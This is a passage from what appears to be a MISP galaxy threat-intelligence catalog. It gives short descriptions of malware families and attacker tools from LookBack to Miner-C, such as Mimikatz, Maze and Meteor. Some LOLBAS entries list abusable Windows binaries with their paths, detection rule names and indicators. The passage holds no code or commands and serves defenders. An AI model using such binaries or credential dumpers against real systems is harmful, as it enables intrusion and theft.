| type | ['malware'] |
Related clusters
To see the related clusters, click here.
LookBack
LookBack is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using LookBack.[Proofpoint LookBack Malware Aug 2019][Dragos TALONITE][Dragos Threat Report 2020]
Internal MISP references
UUID bfd2a077-5000-4500-82c4-5c85fb98dd5a which can be used as unique global reference for LookBack in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0582 |
| source | MITRE |
| type | ['malware'] |
LostMyPassword
LostMyPassword is a tool used to recover passwords from Windows systems.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 41041d5d-0866-4a57-92b7-d075d8b344ad which can be used as unique global reference for LostMyPassword in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5035 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
LoudMiner
LoudMiner is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.[ESET LoudMiner June 2019]
Internal MISP references
UUID f503535b-406c-4e24-8123-0e22fec995bb which can be used as unique global reference for LoudMiner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Windows'] |
| software_attack_id | S0451 |
| source | MITRE |
| tags | ['a2e000da-8181-4327-bacd-32013dbd3654'] |
| type | ['malware'] |
LOWBALL
LOWBALL is malware used by admin@338. It was used in August 2015 in email messages targeting Hong Kong-based media organizations. [FireEye admin@338]
Internal MISP references
UUID fce1117a-e699-4aef-b1fc-04c3967acc33 which can be used as unique global reference for LOWBALL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0042 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Lslsass
Lslsass is a publicly-available tool that can dump active logon session password hashes from the lsass process. [Mandiant APT1]
Internal MISP references
UUID 37a5ae23-3da5-4cbc-a21a-a7ef98a3b7cc which can be used as unique global reference for Lslsass in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0121 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Lucifer
Lucifer is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.[Unit 42 Lucifer June 2020]
Internal MISP references
UUID 723d9a27-74fd-4333-a8db-63df2a8b4dd4 which can be used as unique global reference for Lucifer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0532 |
| source | MITRE |
| type | ['malware'] |
Lurid
Lurid is a malware family that has been used by several groups, including PittyTiger, in targeted attacks as far back as 2006. [Villeneuve 2014] [Villeneuve 2011]
Internal MISP references
UUID 0cc9e24b-d458-4782-a332-4e4fd68c057b which can be used as unique global reference for Lurid in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0010 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Machete
Machete is a cyber espionage toolset used by Machete. It is a Python-based backdoor targeting Windows machines that was first observed in 2010.[ESET Machete July 2019][Securelist Machete Aug 2014][360 Machete Sep 2020]
Internal MISP references
UUID be8a1630-9562-41ad-a621-65989f961a10 which can be used as unique global reference for Machete in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0409 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MacMa
MacMa is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. MacMa has been observed in the wild since November 2021.[ESET DazzleSpy Jan 2022]
Internal MISP references
UUID 7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb which can be used as unique global reference for MacMa in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S1016 |
| source | MITRE |
| type | ['malware'] |
macOS.OSAMiner
macOS.OSAMiner is a Monero mining trojan that was first observed in 2018; security researchers assessed macOS.OSAMiner may have been circulating since at least 2015. macOS.OSAMiner is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.[SentinelLabs reversing run-only applescripts 2021][VMRay OSAMiner dynamic analysis 2021]
Internal MISP references
UUID 74feb557-21bc-40fb-8ab5-45d3af84c380 which can be used as unique global reference for macOS.OSAMiner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S1048 |
| source | MITRE |
| type | ['malware'] |
MacSpy
MacSpy is a malware-as-a-service offered on the darkweb [objsee mac malware 2017].
Internal MISP references
UUID e5e67c67-e658-45b5-850b-044312be4258 which can be used as unique global reference for MacSpy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0282 |
| source | MITRE |
| type | ['malware'] |
Mafalda
Mafalda is a flexible interactive implant that has been used by Metador. Security researchers assess the Mafalda name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. [SentinelLabs Metador Sept 2022]
Internal MISP references
UUID 7506616c-b808-54fb-9982-072a0dcf8a04 which can be used as unique global reference for Mafalda in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1060 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MailSniper
MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.[GitHub MailSniper]
Internal MISP references
UUID d762974a-ca7e-45ee-bc1d-f5218bf46c84 which can be used as unique global reference for MailSniper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Office 365', 'Windows', 'Azure AD'] |
| software_attack_id | S0413 |
| source | MITRE |
| tags | ['15f2277a-a17e-4d85-8acd-480bf84f16b4', 'c9c73000-30a5-4a16-8c8b-79169f9c24aa'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Makecab
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to package existing files into a cabinet (.cab) file
Author: Oddvar Moe
Paths: * C:\Windows\System32\makecab.exe * C:\Windows\SysWOW64\makecab.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_susp_alternate_data_streams.yml * Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml * IOC: Makecab retrieving files from Internet * IOC: Makecab storing data into alternate data streams[Makecab.exe - LOLBAS Project]
Internal MISP references
UUID cf7f05a7-4093-4855-b9d9-b93226056aec which can be used as unique global reference for Makecab in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5123 |
| source | Tidal Cyber |
| tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Manage-bde
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script for managing BitLocker
Author: Oddvar Moe
Paths: * C:\Windows\System32\manage-bde.wsf
Resources: * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 * https://twitter.com/bohops/status/980659399495741441 * https://twitter.com/JohnLaTwC/status/1223292479270600706
Detection: * Sigma: proc_creation_win_lolbin_manage_bde.yml * IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations[Manage-bde.wsf - LOLBAS Project]
Internal MISP references
UUID 9b6b705e-55ae-4d9e-9c57-baf1358cc324 which can be used as unique global reference for Manage-bde in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5259 |
| source | Tidal Cyber |
| tags | ['ff10869f-fed4-4f21-b83a-9939e7381d6e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
MarkiRAT
MarkiRAT is a remote access Trojan (RAT) compiled with Visual Studio that has been used by Ferocious Kitten since at least 2015.[Kaspersky Ferocious Kitten Jun 2021]
Internal MISP references
UUID 40806539-1496-4a64-b740-66f6a1467f40 which can be used as unique global reference for MarkiRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0652 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MASSCAN
According to its GitHub project page, MASSCAN is an "Internet-scale" TCP port scanner. Its usage is similar to that of the popular nmap scanning tool, but it is designed to be operated at a larger scale.[GitHub masscan]
Internal MISP references
UUID 24862f72-a4e0-4a6b-90d7-2465aa86c402 which can be used as unique global reference for MASSCAN in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S5282 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Matryoshka
Matryoshka is a malware framework used by CopyKittens that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. [ClearSky Wilted Tulip July 2017] [CopyKittens Nov 2015]
Internal MISP references
UUID eeb700ea-2819-46f4-936d-f7592f20dedc which can be used as unique global reference for Matryoshka in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0167 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mavinject
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by App-v in Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\mavinject.exe * C:\Windows\SysWOW64\mavinject.exe
Resources: * https://twitter.com/gN3mes1s/status/941315826107510784 * https://twitter.com/Hexcorn/status/776122138063409152 * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection: * Sigma: proc_creation_win_lolbin_mavinject_process_injection.yml * IOC: mavinject.exe should not run unless APP-v is in use on the workstation[LOLBAS Mavinject]
Internal MISP references
UUID aa472f81-7673-4545-89f9-1dd43cead4f1 which can be used as unique global reference for Mavinject in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5124 |
| source | Tidal Cyber |
| tags | ['724c3509-ad5e-46a3-a72c-6f3807b13793', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Maze
Maze ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, Maze operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.[FireEye Maze May 2020][McAfee Maze March 2020][Sophos Maze VM September 2020]
Internal MISP references
UUID 3c206491-45c0-4ff7-9f40-45f9aae4de64 which can be used as unique global reference for Maze in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0449 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad', '1cc90752-70a3-4a17-b370-e1473a212f79', '286918d5-0b48-4655-9118-907b53de0ee0', 'c5c8f954-1bc0-45d5-9a4f-4385d0a720a1', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', '5e7433ad-a894-4489-93bc-41e90da90019', 'a2e000da-8181-4327-bacd-32013dbd3654', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MCMD
MCMD is a remote access tool that provides remote command shell capability used by Dragonfly 2.0.[Secureworks MCMD July 2019]
Internal MISP references
UUID 939cbe39-5b63-4651-b0c0-85ac39cb9f0e which can be used as unique global reference for MCMD in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0500 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
MechaFlounder
MechaFlounder is a python-based remote access tool (RAT) that has been used by APT39. The payload uses a combination of actor developed code and code snippets freely available online in development communities.[Unit 42 MechaFlounder March 2019]
Internal MISP references
UUID 31cbe3c8-be88-4a4f-891d-04c3bb7ed482 which can be used as unique global reference for MechaFlounder in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0459 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MedusaLocker Ransomware
MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.[HC3 Analyst Note MedusaLocker Ransomware February 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/medusalocker/
Internal MISP references
UUID c9e824b2-554b-4f42-b4c3-48e0a841f589 which can be used as unique global reference for MedusaLocker Ransomware in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5022 |
| source | Tidal Cyber |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
meek
meek is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.
Internal MISP references
UUID 6c3bbcae-3217-43c7-b709-5c54bc7636b1 which can be used as unique global reference for meek in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0175 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
MegaCortex
MegaCortex is ransomware that first appeared in May 2019. [IBM MegaCortex] MegaCortex has mainly targeted industrial organizations. [FireEye Ransomware Disrupt Industrial Production][FireEye Financial Actors Moving into OT]
Internal MISP references
UUID d8a4a817-2914-47b0-867c-ad8eeb7efd10 which can be used as unique global reference for MegaCortex in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0576 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
MEGAsync
A legitimate binary that automates syncing between an endpoint and the MEGA Cloud Drive.[GitHub meganz MEGAsync] Adversaries are known to abuse the tool for data exfiltration purposes.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID eed908e5-a0b3-473f-bca4-0d3197af2168 which can be used as unique global reference for MEGAsync in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S5005 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Melcoz
Melcoz is a banking trojan family built from the open source tool Remote Access PC. Melcoz was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.[Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID aa844e6b-feda-4928-8c6d-c59f7be88da0 which can be used as unique global reference for Melcoz in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0530 |
| source | MITRE |
| type | ['malware'] |
MESSAGETAP
MESSAGETAP is a data mining malware family deployed by APT41 into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. [FireEye MESSAGETAP October 2019]
Internal MISP references
UUID 15d7e478-349d-42e6-802d-f16302b98319 which can be used as unique global reference for MESSAGETAP in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0443 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
metaMain
metaMain is a backdoor used by Metador to maintain long-term access to compromised machines; it has also been used to decrypt Mafalda into memory.[SentinelLabs Metador Sept 2022][SentinelLabs Metador Technical Appendix Sept 2022]
Internal MISP references
UUID 0a9874bf-4f02-5fab-8ab6-d0f42c6bc71d which can be used as unique global reference for metaMain in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1059 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Metamorfo
Metamorfo is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.[Medium Metamorfo Apr 2020][ESET Casbaneiro Oct 2019]
Internal MISP references
UUID ca607087-25ad-4a91-af83-608646cccbcb which can be used as unique global reference for Metamorfo in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0455 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Metasploit
The Metasploit Framework is an open-source software project that aids in penetration testing.[Metasploit_Ref] The software is often abused by malicious actors to perform a range of post-exploitation activities.
Internal MISP references
UUID 8d3b1150-8bb3-49a8-8266-7023e3c5e50a which can be used as unique global reference for Metasploit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S5050 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Meteor
Meteor is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. Meteor is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.[Check Point Meteor Aug 2021]
Internal MISP references
UUID ee07030e-ff50-404b-ad27-ab999fc1a23a which can be used as unique global reference for Meteor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0688 |
| source | MITRE |
| type | ['malware'] |
Mftrace
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Trace log generation tool for Media Foundation Tools.
Author: Oddvar Moe
Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 * C:\Program Files (x86)\Windows Kits\10\bin\x86 * C:\Program Files (x86)\Windows Kits\10\bin\x64
Resources: * https://twitter.com/0rbz_/status/988911181422186496
Detection: * Sigma: proc_creation_win_lolbin_mftrace.yml[Mftrace.exe - LOLBAS Project]
Internal MISP references
UUID 4184f447-6f74-487b-be08-6330a6b78992 which can be used as unique global reference for Mftrace in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5224 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Micropsia
Micropsia is a remote access tool written in Delphi.[Talos Micropsia June 2017][Radware Micropsia July 2018]
Internal MISP references
UUID 5879efc1-f122-43ec-a80d-e25aa449594d which can be used as unique global reference for Micropsia in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0339 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
Microsoft.NodejsTools.PressAnyKey
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Part of the NodeJS Visual Studio tools.
Author: mr.d0x
Paths: * C:\Program Files\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe * C:\Program Files (x86)\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
Resources: * https://twitter.com/mrd0x/status/1463526834918854661
Detection: * Sigma: proc_creation_win_renamed_pressanykey.yml * Sigma: proc_creation_win_pressanykey_lolbin_execution.yml[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project]
Internal MISP references
UUID 370b00ba-1f91-4375-8a4c-5ca67066f4fd which can be used as unique global reference for Microsoft.NodejsTools.PressAnyKey in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5225 |
| source | Tidal Cyber |
| tags | ['eb75bfce-e0d6-41b3-a3f0-df34e6e9b476', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Microsoft.Workflow.Compiler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: Conor Richard
Paths: * C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Resources: * https://twitter.com/mattifestation/status/1030445200475185154 * https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb * https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1 * https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1 * https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks * https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/ * https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
Detection: * Sigma: proc_creation_win_lolbin_workflow_compiler.yml * Splunk: suspicious_microsoft_workflow_compiler_usage.yml * Splunk: suspicious_microsoft_workflow_compiler_rename.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. * IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe * IOC: Presence of "<CompilerInput" in a text file.[Microsoft.Workflow.Compiler.exe - LOLBAS Project]
Internal MISP references
UUID 27bd5fc3-17d9-46fa-84ce-c772736512cd which can be used as unique global reference for Microsoft.Workflow.Compiler in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5125 |
| source | Tidal Cyber |
| tags | ['b48e3fa8-25b4-42be-97e7-086068a150c5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Milan
Milan is a backdoor implant based on DanBot that was written in Visual C++ and .NET. Milan has been used by HEXANE since at least June 2020.[ClearSky Siamesekitten August 2021][Kaspersky Lyceum October 2021]
Internal MISP references
UUID 57545dbc-c72a-409d-a373-bc35e25160cd which can be used as unique global reference for Milan in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1015 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mimikatz
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [Deply Mimikatz] [Adsecurity Mimikatz Guide]
Internal MISP references
UUID b8e7c0b4-49e4-4e8d-9467-b17f305ddf16 which can be used as unique global reference for Mimikatz in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0002 |
| source | MITRE |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '5fda51b0-dfda-49bd-8615-524b45d4cd44', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
MimiPenguin
MimiPenguin is a credential dumper, similar to Mimikatz, designed specifically for Linux platforms. [MimiPenguin GitHub May 2017]
Internal MISP references
UUID 42350632-b59a-4cc5-995e-d95d8c608553 which can be used as unique global reference for MimiPenguin in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0179 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Miner-C
Miner-C is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. [Softpedia MinerC]
Internal MISP references
UUID c0dea9db-1551-4f6c-8a19-182efc34093a which can be used as unique global reference for Miner-C in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0133 |
| source | MITRE |
| type | ['malware'] |
MiniDuke
